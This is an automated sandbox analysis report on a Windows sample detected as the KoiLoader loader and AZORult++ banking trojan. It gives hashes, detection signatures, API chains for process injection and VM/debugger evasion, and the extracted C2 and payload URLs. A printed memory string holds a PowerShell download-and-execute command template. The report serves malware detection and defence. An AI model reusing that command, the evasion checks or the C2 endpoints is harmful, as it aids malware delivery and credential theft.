Windows Analysis Report
DWbCUTdGhV.exe

Overview

General Information

Sample name: DWbCUTdGhV.exe
renamed because original name is a hash value
Original sample name: 13b4c5dff00cf1ea8a635743903e387f.exe
Analysis ID: 1528826
MD5: 13b4c5dff00cf1ea8a635743903e387f
SHA1: de5d0e9a174171257a9539117d82659bbad98139
SHA256: af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
Tags: exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: DWbCUTdGhV.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp Malware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
Multi AV Scanner detection for submitted file
Source: DWbCUTdGhV.exe ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe Virustotal: Detection: 76% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: DWbCUTdGhV.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8316 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW, 0_2_011F8316
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8340 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_011F8340
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8F40 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_011F8F40
Uses 32bit PE files
Source: DWbCUTdGhV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DWbCUTdGhV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00798ACD FindFirstFileExW, 0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://121.127.33.20/fermentum.php
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F62B0 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree, 0_2_011F62B0
Source: DWbCUTdGhV.exe String found in binary or memory: http://121.127.33.20/fermentum.php
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://121.127.33.20/fermentum.php%temp%
Source: DWbCUTdGhV.exe String found in binary or memory: https://kionaonline.com/modules/bonslick
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kionaonline.com/modules/bonslick/c

E-Banking Fraud
barindex
Detected AZORult++ Trojan
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8DD0 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_011F8DD0
Contains functionality to call native functions
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5E70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_011F5E70
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_011F5AF0
Detected potential crypto function
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079E87D 0_2_0079E87D
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7440 0_2_011F7440
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7860 0_2_011F7860
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F24A0 0_2_011F24A0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F4260 0_2_011F4260
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F4660 0_2_011F4660
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: String function: 00793040 appears 46 times
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: String function: 00794480 appears 33 times
Uses 32bit PE files
Source: DWbCUTdGhV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F6210 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_011F6210
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F6BC0 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear, 0_2_011F6BC0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Command line argument: jhl46745fghb 0_2_00792F40
Source: DWbCUTdGhV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DWbCUTdGhV.exe ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe Virustotal: Detection: 76%
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: sspicli.dll Jump to behavior
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DWbCUTdGhV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Yara detected KoiLoader
Source: Yara match File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DWbCUTdGhV.exe.11f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DWbCUTdGhV.exe PID: 2132, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00791300

Malware Analysis System Evasion
barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_011F8620
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe File opened / queried: C:\Windows\System32\VBoxService.exe Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe API coverage: 9.8 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00798ACD FindFirstFileExW, 0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
Source: DWbCUTdGhV.exe Binary or memory string: Hyper-V
Source: DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: DWbCUTdGhV.exe Binary or memory string: VMWare
Source: DWbCUTdGhV.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: DWbCUTdGhV.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe API call chain: ExitProcess graph end node
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0079695B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00791300
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791710 mov ecx, dword ptr fs:[00000030h] 0_2_00791710
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007975A2 mov eax, dword ptr fs:[00000030h] 0_2_007975A2
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00799763 mov eax, dword ptr fs:[00000030h] 0_2_00799763
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7650 mov eax, dword ptr fs:[00000030h] 0_2_011F7650
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5E70 mov eax, dword ptr fs:[00000030h] 0_2_011F5E70
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079A845 GetProcessHeap, 0_2_0079A845
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0079695B
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00793D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00793D4E
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0079421C
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007943AF SetUnhandledExceptionFilter, 0_2_007943AF

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_011F5AF0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007944C5 cpuid 0_2_007944C5
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00794103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00794103
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528826 Sample: DWbCUTdGhV.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 8 Found malware configuration 2->8 10 Antivirus / Scanner detection for submitted sample 2->10 12 Multi AV Scanner detection for submitted file 2->12 14 4 other signatures 2->14 5 DWbCUTdGhV.exe 2->5         started        process3 signatures4 16 Detected AZORult++ Trojan 5->16 18 Found evasive API chain (may stop execution after checking mutex) 5->18 20 Contain functionality to detect virtual machines 5->20 22 2 other signatures 5->22
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://121.127.33.20/fermentum.php true unknown